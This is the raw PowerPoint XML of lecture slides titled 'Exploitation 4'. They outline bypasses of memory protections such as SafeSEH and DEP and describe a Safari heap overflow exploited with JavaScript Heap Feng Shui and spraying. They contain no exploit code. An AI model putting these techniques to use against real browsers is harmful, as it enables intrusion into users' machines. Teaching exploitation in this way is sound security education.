              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SafeSEH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t bounce off protected .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dlls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NX heap/stack (DEP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not enabled in IE currently and most 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> party vendors didn’t “opt-in” either</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This just recently changed! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adobe 9, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Quicktime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 7.7, and others are now opting IN, and they prepare for compatibility with IE 9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MacBook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Air bug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51248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client side in Safari</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript heap staging was used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Alluded to in Exploitation 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Based on the technique called “Heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Feng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in JavaScript”, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Alexandoer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sotirov</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ported to work with Safari</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Heap overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But how does one gain reliable control in an otherwise unreliable heap?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This attack works regardless of the browser state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Feng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> + Spraying does the trick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2757</TotalTime>
  <Words>908</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>138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Aspect</vt:lpstr>
      <vt:lpstr>Exploitation 4</vt:lpstr>
      <vt:lpstr>Previously covered</vt:lpstr>
      <vt:lpstr>Modern Protections</vt:lpstr>
      <vt:lpstr>In the face of adversity</vt:lpstr>
      <vt:lpstr>Client side bugs … we love you</vt:lpstr>
      <vt:lpstr>An Example: LinkedIn</vt:lpstr>
      <vt:lpstr>Slide 7</vt:lpstr>
      <vt:lpstr>Thoughts on spraying</vt:lpstr>
      <vt:lpstr>The MacBook Air bug</vt:lpstr>
      <vt:lpstr>More on heap staging for MacB</vt:lpstr>
      <vt:lpstr>What would have saved MacB?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Rainbows</dc:title>
  <dc:creator>jared</dc:creator>
  <cp:lastModifiedBy>jared</cp:lastModifiedBy>
  <cp:revision>157</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2008-07-17T11:26:21Z</dcterms:modified>
</cp:coreProperties>
</file>